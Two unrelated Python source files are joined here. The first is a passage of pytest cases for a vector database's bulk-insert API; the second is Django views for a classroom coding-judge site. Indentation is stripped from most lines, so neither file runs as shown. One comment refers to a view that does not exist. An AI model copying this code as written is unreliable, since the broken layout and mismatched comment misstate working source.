insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, insert_entities)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_type_not_match_B(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.DOUBLE)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it (idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus.bulk_insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
t = TestThread(target=insert, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
res_count = milvus.count_entities(collection)
assert res_count == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.bulk_insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_entities_new(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities_new)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_tag(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_tag param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.bulk_insert(binary_collection, default_binary_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(binary_collection, default_tag)
# TODO
@pytest.mark.level(2)
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
ids = connect.bulk_insert(binary_collection, default_binary_entity)
assert len(ids) == 1
connect.flush([binary_collection])
assert connect.count_entities(binary_collection) == default_nb
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
info = connect.get_collection_info(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test build index after inserting vectors
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
info = connect.get_collection_info(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test search vector after inserting binary vectors
method: insert vectors, flush, and search the collection
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1, metric_type="JACCARD")
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert res
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check status")
assert result
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True)
ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
ids = connect.bulk_insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(ids) == nb
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status)
future.done()
@pytest.mark.level(2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result) == nb
connect.flush([collection])
count = connect.count_entities(collection)
logging.getLogger().info(count)
assert count == nb
@pytest.mark.level(2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
count = connect.count_entities(collection)
assert count == 0
def test_insert_async_invalid_params(self, connect):
'''
        target: test asynchronous insert into a non-existent collection
        method: insert entities into a collection name that was never created
        expected: future.result() raises an exception
'''
collection_new = gen_unique_str()
future = connect.bulk_insert(collection_new, default_entities, _async=True)
with pytest.raises(Exception) as e:
result = future.result()
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
        target: test asynchronous insert with an empty entity list
        method: insert an empty list of entities with _async=True
        expected: future.result() raises an exception
'''
entities = []
future = connect.bulk_insert(collection, entities, _async=True)
with pytest.raises(Exception) as e:
future.result()
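    # The asynchronous insert pattern exercised above, as a minimal sketch
    # (names as used in these tests):
    #
    #     future = connect.bulk_insert(collection, entities, _async=True,
    #                                  _callback=callback)   # returns a future
    #     ids = future.result()                              # block until finished
    #     future.done()                                      # or wait for completion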
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
def test_insert_vector_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
        expected: row count equals default_nb for each collection
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(ids) == default_nb
count = connect.count_entities(collection_name)
assert count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(ids) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_insert_vector_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entity)
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection_name)
assert count == 0
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush()
count = connect.count_entities(collection_name)
assert count == 1
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_search_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
result = connect.search(collection_name, default_single_query)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_search_vector_another(self, connect, collection):
'''
        target: test searching one collection after inserting a vector into another
        method: insert a vector into collection_1, flush, then search collection_2
        expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
result = connect.search(collection_name, default_single_query)
class TestInsertInvalid(object):
"""
    Test inserting entities with invalid collection names, partition tags, field names, field types, field values and entity ids
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(id_collection, default_entities, ids)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.bulk_insert(collection_name, default_entity)
def test_insert_with_invalid_tag_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
else:
connect.bulk_insert(collection, default_entity, partition_tag=tag_name)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
field_name = get_field_name
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_invalid_field_vector_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
    Test inserting binary entities with invalid field names, field types, field values and entity ids
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.level(2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.bulk_insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.level(2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
@pytest.mark.level(2)
    def test_insert_entities_with_invalid_field_vector_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entities)
src_vector = tmp_entity[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.bulk_insert(binary_collection, tmp_entity)
|
views.py
|
import os
import threading
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import render, redirect
from django.utils import timezone
from django.utils.datastructures import MultiValueDictKeyError
import submissions.views
from classroom.models import ClassroomStudents
from contest.models import Contest
from lab.models import Lab
from submissions.models import Submission
# from submissions.views import submitCode
from users.decorators import faculty_required
from .models import Problem, TestCase, ProblemComment
'''
Function for role-based authorization of a Problem, given the pid supplied in the request parameters
'''
def customRoleBasedProblemAuthorization(request, problem, isItLab):
user = request.user
# If Faculty hasn't created classroom
# or Student is not enrolled to the classroom
if user.isStudent:
try:
if isItLab:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=problem.lab.classroom)
else:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=problem.contest.classroom)
except ObjectDoesNotExist:
return False
else:
if ((isItLab and problem.lab.classroom.user != user) or (
not isItLab and problem.contest.classroom.user != user)):
return False
return True
'''
Function for role-based authorization of the Problem that a Test Case belongs to
'''
def customRoleBasedTestProblemAuthorization(request, problem):
user = request.user
if ((not problem.doesBelongToContest and problem.lab.classroom.user != user) or (
problem.doesBelongToContest and problem.contest.classroom.user != user)):
return False
return True
'''
Function for role-based authorization of a Lab, given the labId supplied in the request parameters
'''
def customRoleBasedLabAuthorization(request, lab):
user = request.user
# If Faculty hasn't created classroom
# or Student is not enrolled to the classroom
if user.isStudent:
try:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=lab.classroom)
except ObjectDoesNotExist:
return False
else:
if lab.classroom.user != user:
return False
return True
'''
Function for role-based authorization of a Contest, given the contestId supplied in the request parameters
'''
def customRoleBasedContestAuthorization(request, contest):
user = request.user
# If Faculty hasn't created the classroom for which current contest belongs
# or If Student is not enrolled to the classroom for which current contest belongs
if user.isStudent:
try:
classroomStudents = ClassroomStudents.objects.get(student=user, classroom=contest.classroom)
except ObjectDoesNotExist:
return False
else:
if contest.classroom.user != user:
return False
return True
'''
Function to get Problem based on provided pid
'''
def getProblem(request):
try:
# If request method is GET
if request.method == "GET":
pid = request.GET["pid"]
else:
pid = request.POST["pid"]
problem = Problem.objects.get(problemId=pid)
return True, pid, problem
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return False, None, None
'''
Function to get Test Case based on provided tid
'''
def getTestCase(request):
try:
# If request method is GET
if request.method == "GET":
return False, None, None
else:
tid = request.POST["tid"]
print(tid)
testCase = TestCase.objects.get(testCaseId=tid)
return True, tid, testCase
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
return False, None, None
'''
Function to get Contest/Lab based on provided Id
'''
def getContestOrLab(request):
try:
isItLab = False
labId = None
contestId = None
if request.method == "GET":
if (request.GET.get('labId')):
labId = request.GET["labId"]
else:
contestId = request.GET["contestId"]
else:
if (request.POST.get('contestId')):
contestId = request.POST["contestId"]
else:
labId = request.POST["labId"]
if (not labId and contestId):
contest = Contest.objects.get(contestId=contestId)
isItLab = False
return True, contestId, contest, isItLab
elif (not contestId and labId):
lab = Lab.objects.get(labId=labId)
isItLab = True
return True, labId, lab, isItLab
else:
return False, None, None, False
except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
print('exception')
return False, None, None, False
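# getContestOrLab() returns a 4-tuple (found, objectId, contestOrLab, isItLab).
# Illustrative values: a request carrying labId=3 yields (True, '3', <Lab>, True),
# while one carrying contestId=7 yields (True, '7', <Contest>, False).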
'''
Function which will convert Django DateTime to HTML DateTime
'''
def convertDjangoDateTimeToHTMLDateTime(contest):
# Converting Datetime field into HTML formatted string
startTimeString = str(contest.startTime.strftime("%Y-%m-%dT%H:%M"))
endTimeString = str(contest.endTime.strftime("%Y-%m-%dT%H:%M"))
return startTimeString, endTimeString
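# Example: a contest starting on 30 May 2021 at 14:05 is rendered as the string
# "2021-05-30T14:05", the value format expected by HTML
# <input type="datetime-local"> elements.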
'''
Function to get list of all Test Cases belonging to the Problem
'''
@faculty_required()
def testList(request):
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedTestProblemAuthorization(request, problem):
return render(request, 'accessDenied.html', {})
testCases = TestCase.objects.filter(problem=problem)
isOver = False
if problem.doesBelongToContest:
if timezone.now() >= problem.contest.endTime:
isOver = True
else:
if timezone.now() >= problem.lab.deadline:
isOver = True
return render(request, 'problem/testsList.html',
{'tests': testCases, 'pid': pid, 'problem': problem, 'isOver': isOver})
'''Thread target that re-evaluates all submissions of the given problem in the background'''
def reevaluateSubmissionThread(problemId, request):
problem = Problem.objects.get(problemId=problemId)
print("Submission Reevaluation Started for problem :- ", problem.title)
submittedSubmissions = Submission.objects.filter(problem=problem)
for submission in submittedSubmissions:
uploadDirectory = settings.MEDIA_ROOT
file = open(os.path.join(uploadDirectory, submission.filePath), "r")
code = file.read()
request.GET._mutable = True
request.GET["code"] = code
request.GET["problemId"] = problemId
submissions.views.submitCode(request, update=True, submission=submission)
file.close()
print("Submission Reevaluation Finished for problem :- ", problem.title)
'''Function for reevaluating submissions after updating test cases'''
def reEvaluateSubmissions(request, problemId):
thread = threading.Thread(target=reevaluateSubmissionThread, args=[problemId, request])
    thread.daemon = True
thread.start()
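# The views below (testCreate, testDelete, testEdit) call reEvaluateSubmissions()
# after changing a problem's test cases, so re-grading runs in a daemon thread
# and the HTTP response is returned without waiting for it.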
'''
Function to create Test Case belonging to the Problem
'''
@faculty_required()
def testCreate(request):
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedTestProblemAuthorization(request, problem):
return render(request, 'accessDenied.html', {})
try:
outputFile = request.FILES['outputFile']
inputFile = request.FILES['inputFile']
except MultiValueDictKeyError:
return render(request, 'problem/testsList.html', {"errorMessage": "Files are not selected"})
newTestcase = TestCase(problem=problem, inputFile=inputFile, outputFile=outputFile)
newTestcase.save()
reEvaluateSubmissions(request, problem.problemId)
return redirect('/problems/tests?pid=' + pid)
'''
Function to delete a Test Case belonging to the Problem
'''
@faculty_required()
def testDelete(request):
result, tid, testCase = getTestCase(request)
if not result:
return render(request, '404.html', {})
else:
if not customRoleBasedTestProblemAuthorization(request, testCase.problem):
return render(request, 'accessDenied.html', {})
testCase.inputFile.delete()
testCase.outputFile.delete()
testCase.delete()
reEvaluateSubmissions(request, testCase.problem.problemId)
return redirect('/problems/tests/?pid=' + str(testCase.problem.problemId))
'''
Function to get list of all Problems
'''
@login_required(login_url='/users/login')
def list(request):
    # If the classroom does not exist, or it does not belong to this faculty member or student
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
idName = ""
# Problem list will be shown belonging to the particular contest or lab
isOver = False
isStarted = False
hours = timezone.now().hour
minutes = timezone.now().minute
seconds = timezone.now().second
if isItLab:
idName = "labId"
problems = Problem.objects.filter(lab=object, doesBelongToContest=False)
if timezone.now() >= object.deadline:
isOver = True
else:
idName = "contestId"
problems = Problem.objects.filter(contest=object, doesBelongToContest=True)
if timezone.now() >= object.endTime:
isOver = True
hours = object.endTime.hour - timezone.now().hour
minutes = object.endTime.minute - timezone.now().minute
seconds = object.endTime.second - timezone.now().second
if timezone.now() >= object.startTime and timezone.now() <= object.endTime:
            isStarted = True
return render(request, 'problem/list.html',
{'problems': problems, 'idName': idName, 'idValue': objectId, 'isItLab': isItLab, "object": object, 'isOver': isOver, 'isStarted': isStarted, 'hours': hours, 'minutes': minutes, 'seconds': seconds})
'''
Function to create Problem
'''
@faculty_required()
def create(request):
    # If the classroom does not exist, or it does not belong to this faculty member or student
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
idName = "labId"
else:
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/create.html', {'idName': idName, 'idValue': objectId})
# Saving the Problem data
title = request.POST['title']
description = request.POST['description']
difficulty = request.POST['difficulty']
points = request.POST['points']
timeLimit = request.POST['timeLimit']
if isItLab:
newProblem = Problem(title=title, description=description, difficulty=difficulty, points=points,
timeLimit=timeLimit, doesBelongToContest=False, lab=object)
else:
newProblem = Problem(title=title, description=description, difficulty=difficulty, points=points,
timeLimit=timeLimit, doesBelongToContest=True, contest=object)
newProblem.save()
return redirect("/problems/?" + idName + "=" + objectId)
'''
Function to get Problem details
'''
@login_required(login_url='/users/login')
def view(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
isOver = False
if isItLab:
idName = "labId"
if timezone.now() >= object.deadline:
isOver = True
else:
idName = "contestId"
if timezone.now() >= object.endTime:
isOver = True
return render(request, 'problem/view.html',
{'problem': problem, 'idName': idName, 'idValue': objectId, 'isOver': isOver})
'''
Function to edit the Problem details
'''
@faculty_required()
def edit(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
problem.doesBelongToContest = False
idName = "labId"
else:
problem.doesBelongToContest = True
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/edit.html', {'problem': problem, 'idName': idName, 'idValue': objectId})
# Saving the Problem data
problem.title = request.POST['title']
problem.description = request.POST['description']
problem.difficulty = request.POST['difficulty']
problem.points = request.POST['points']
problem.timeLimit = request.POST['timeLimit']
problem.save()
    return redirect('/problems/view?pid=' + str(problem.problemId) + "&" + idName + "=" + objectId)
'''
Function to delete particular Problem
'''
@faculty_required()
def delete(request):
result, objectId, object, isItLab = getContestOrLab(request)
if not result:
return render(request, '404.html', {})
if isItLab:
if not customRoleBasedLabAuthorization(request, object):
return render(request, 'accessDenied.html', {})
else:
if not customRoleBasedContestAuthorization(request, object):
return render(request, 'accessDenied.html', {})
    # If the problem does not exist, or the contest/lab does not belong to this faculty member or student
result, pid, problem = getProblem(request)
if not result:
return render(request, '404.html', {})
if not customRoleBasedProblemAuthorization(request, problem, isItLab):
return render(request, 'accessDenied.html', {})
idName = ""
if isItLab:
problem.doesBelongToContest = False
idName = "labId"
else:
problem.doesBelongToContest = True
idName = "contestId"
if request.method == 'GET':
return render(request, 'problem/delete.html', {'problem': problem, 'idName': idName, 'idValue': objectId})
problem.delete()
return redirect('/problems?' + idName + "=" + objectId)
